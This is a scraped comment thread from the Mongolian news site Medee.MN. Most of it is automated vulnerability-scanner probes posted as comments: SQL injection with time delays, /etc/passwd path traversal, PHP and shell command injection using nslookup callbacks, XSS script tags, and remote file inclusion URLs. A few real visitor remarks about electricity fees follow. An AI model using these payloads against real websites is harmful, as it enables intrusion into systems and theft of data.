GRLpGpAG [acu1491<s1﹥s2ʺs3ʹuca1491] 2020-10-28 20:37:57

1

<!-- [116.113.93.82] 2020-10-28 20:37:57

1

'" [116.113.93.82] 2020-10-28 20:37:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:56

<!--

GRLpGpAG [116.113.93.829806940] 2020-10-28 20:37:56

1

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 20:37:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:55

'"

testasp.vulnweb.com [116.113.93.82] 2020-10-28 20:37:54

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 20:37:54

1

GRLpGpAG ['"()&%<acx><ScRiPt >1Yrb(9836)</ScRiPt>] 2020-10-28 20:37:53

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 20:37:53

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 20:37:53

1

GRLpGpAG [] 2020-10-28 20:37:53

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 20:37:52

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 20:37:52

1

GRLpGpAG [<!--] 2020-10-28 20:37:52

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 20:37:52

1

GRLpGpAG [] 2020-10-28 20:37:52

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >1Yrb(9346)</ScRiPt>] 2020-10-28 20:37:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:51

/www.vulnweb.com

GRLpGpAG ['"] 2020-10-28 20:37:51

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 20:37:51

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 20:37:51

1

GRLpGpAG [JyI=] 2020-10-28 20:37:50

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 20:37:50

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 20:37:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:50

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:49

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [@@FZaeD] 2020-10-28 20:37:49

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 20:37:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:49

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:49

${@print(md5(acunetix_wvs_security_test))}

create/. [116.113.93.82] 2020-10-28 20:37:48

1

http://hitvqNJvPudtZ.bxss.me/ [116.113.93.82] 2020-10-28 20:37:48

1

GRLpGpAG [1] 2020-10-28 20:37:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:48

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:48

";print(md5(acunetix_wvs_security_test));$a="

create [116.113.93.82] 2020-10-28 20:37:48

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 20:37:48

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 20:37:47

1

GRLpGpAG [\] 2020-10-28 20:37:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:47

http://hityFQnzx4KD9.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:47

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:47

';print(md5(acunetix_wvs_security_test));$a='

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 20:37:47

1

create [116.113.93.82] 2020-10-28 20:37:47

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 20:37:47

1

GRLpGpAG [1'"] 2020-10-28 20:37:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:47

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:47

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 20:37:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:46

create/.

) [116.113.93.82] 2020-10-28 20:37:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:46

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 20:37:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:46

create

GRLpGpAG [http://hitrbzc9WxzQ5.bxss.me/] 2020-10-28 20:37:45

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:37:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:45

^(#$!@#$)(()))******

Array [116.113.93.82] 2020-10-28 20:37:45

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 20:37:45

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:44

create

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:37:44

1

'"() [116.113.93.82] 2020-10-28 20:37:44

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:44

!(()&&!|*|*|

Array [116.113.93.82] 2020-10-28 20:37:44

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 20:37:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:43

testasp.vulnweb.com/t/xss.html?%00

Array [116.113.93.82] 2020-10-28 20:37:43

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:43

)

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 20:37:43

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 20:37:42

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:42

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:42

HttP://testasp.vulnweb.com/t/xss.html?%00

Зочин [116.113.93.82] 2020-10-28 20:37:42

1

GRLpGpAG [..] 2020-10-28 20:37:42

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 20:37:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:41

Array

GRLpGpAG&n921054=v900087 [116.113.93.82] 2020-10-28 20:37:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:41

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 20:37:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:41

Array

GRLpGpAG [create/.] 2020-10-28 20:37:41

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 20:37:40

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 20:37:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:39

Array

GRLpGpAG [create] 2020-10-28 20:37:39

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 20:37:39

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 20:37:39

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:37:39

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 20:37:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:39

1&n937018=v969051

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 20:37:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:38

12345'"\'\");|]*{ <>

GRLpGpAG [create] 2020-10-28 20:37:38

1

GRLpGpAG [tH4nyNAP'));select pg_sleep(9); -- ] 2020-10-28 20:37:38

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 20:37:38

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 20:37:38

1

GRLpGpAG ['"()] 2020-10-28 20:37:38

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:37:38

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 20:37:38

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 20:37:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:38

GRLpGpAG [qqjzFJRJ');select pg_sleep(9); -- ] 2020-10-28 20:37:38

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 20:37:38

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 20:37:37

1

GRLpGpAG [Array] 2020-10-28 20:37:37

1

T2dYT2lEZUk= [116.113.93.82] 2020-10-28 20:37:37

1

GRLpGpAG [/etc/passwd] 2020-10-28 20:37:37

1

GRLpGpAG [)] 2020-10-28 20:37:37

1

GRLpGpAG [VIsY0Vod';select pg_sleep(9); -- ] 2020-10-28 20:37:37

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 20:37:37

1

GRLpGpAG [116.113.93.82&n953914=v909036] 2020-10-28 20:37:37

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 20:37:36

1

GRLpGpAG [5FrKyXnf'; waitfor delay '0:0:6' -- ] 2020-10-28 20:37:36

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 20:37:36

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:36

1

GRLpGpAG [1 waitfor delay '0:0:6' -- ] 2020-10-28 20:37:35

1

${9999188+9999293} [116.113.93.82] 2020-10-28 20:37:35

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 20:37:35

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 20:37:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:34

${9999536+10000021}

GRLpGpAG [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 20:37:34

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 20:37:34

1

&nslookup 082fB4Z2&'\"`0&nslookup 082fB4Z2&`' [116.113.93.82] 2020-10-28 20:37:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:33

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [Array] 2020-10-28 20:37:33

1

"+response.write(9541363*9320987)+" [116.113.93.82] 2020-10-28 20:37:33

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 20:37:33

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 20:37:33

1

$(nslookup b4l7Hmql) [116.113.93.82] 2020-10-28 20:37:33

1

GRLpGpAG [Array] 2020-10-28 20:37:32

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 20:37:32

1

'+response.write(9541363*9320987)+' [116.113.93.82] 2020-10-28 20:37:32

1

set|set&set [116.113.93.82] 2020-10-28 20:37:32

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 20:37:32

1

GRLpGpAG [${10000247+9999541}] 2020-10-28 20:37:32

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 20:37:31

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 20:37:31

1

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-28 20:37:31

1

response.write(9541363*9320987) [116.113.93.82] 2020-10-28 20:37:31

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:31

&nslookup bhrTM2rs&'\"`0&nslookup bhrTM2rs&`'

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 20:37:31

1

GRLpGpAG [] 2020-10-28 20:37:30

1

GRLpGpAG [-1" OR 2+215-215-1=0+0+0+1 -- ] 2020-10-28 20:37:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:30

"+response.write(9789540*9186969)+"

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 20:37:30

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:30

$(nslookup 2hZiiMFo)

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:29

'+response.write(9789540*9186969)+'

GRLpGpAG [-1' OR 2+501-501-1=0+0+0+1 or 'rUYytYGR'='] 2020-10-28 20:37:29

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:28

set|set&set

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:28

response.write(9789540*9186969)

GRLpGpAG [-1' OR 2+135-135-1=0+0+0+1 -- ] 2020-10-28 20:37:28

1

XDSGdWWI [116.113.93.82] 2020-10-28 20:37:28

1

GRLpGpAG [-1 OR 2+415-415-1=0+0+0+1] 2020-10-28 20:37:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:27

D8npuF53

GRLpGpAG [-1 OR 2+92-92-1=0+0+0+1 -- ] 2020-10-28 20:37:26

1

GRLpGpAG [A7cwsx1A] 2020-10-28 20:37:26

1

GRLpGpAG [&nslookup yd3bKetW&'\"`0&nslookup yd3bKetW&`'] 2020-10-28 20:37:25

1

GRLpGpAG [3mkE07IA] 2020-10-28 20:37:25

1

GRLpGpAG ["+response.write(9879752*9839383)+"] 2020-10-28 20:37:25

1

GRLpGpAG [$(nslookup OKwzCTSP)] 2020-10-28 20:37:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:24

1

GRLpGpAG ['+response.write(9879752*9839383)+'] 2020-10-28 20:37:24

1

GRLpGpAG [set|set&set] 2020-10-28 20:37:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:37:23

1

GRLpGpAG [response.write(9879752*9839383)] 2020-10-28 20:37:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:32:50

1

Зочин [203.91.115.53] 2020-10-27 09:07:15

өмнөх жилүүдийн адилаар өрхийн 150 киловаттыг л чөлөөлж байгаа шүүдэ . түүнээс давсаныгаа айлууд төлнө шүүдэ

Зочин [202.9.46.154] 2020-10-27 08:08:04

mash zov


1022 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1022 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.